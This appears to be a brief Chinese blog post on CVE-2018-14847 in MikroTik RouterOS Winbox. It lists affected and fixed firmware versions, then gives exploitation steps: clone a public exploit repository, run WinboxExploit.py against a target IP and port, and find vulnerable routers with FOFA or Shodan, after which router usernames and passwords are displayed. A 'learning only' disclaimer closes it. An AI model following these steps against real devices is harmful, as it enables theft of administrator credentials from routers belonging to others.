网络安全技术 ·

CVE-2018-14847 简单利用


MikroTik RouterOS是一个基于Linux开发的网络设备操作系统,兼容x86、ARM、MIPS等多种CPU架构,因此RouterOS也可以安装在PC上将其作为软路由,提供防火墙、VPN、无线网络等多种功能与服务。RouterOS提供了多种途径对其进行管理与配置,包括SSH、Telnet、Web界面(Webfig)与客户端软件(Winbox)等。

来自全球知名高科技网络安全公司Tenable的安全研究人员Jacob Baines针对CVE-2018-14847发布了一段新的概念验证(PoC)代码,实现了在受漏洞影响的MikroTik路由器上的远程代码执行。

影响范围

6.42.7以及6.40.9之前的所有Mikrotik RouterOS固件版本

修复方式

RouterOS版本6.40.9、6.42.7、6.43

漏洞利用

下载CVE-2018-14847

git clone 

https://github.com/jas502n/CVE-2018-14847

cd CVE-2018-14847

python WinboxExploit.py ip

利用FOFA搜索有漏洞的版本,ShoDan也可以。

搜索到目标后,利用CVE-2018-14847,语法为:

python3 WinboxExploit.py ip port

利用成功后会自动显示用户名和密码。

注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

参与评论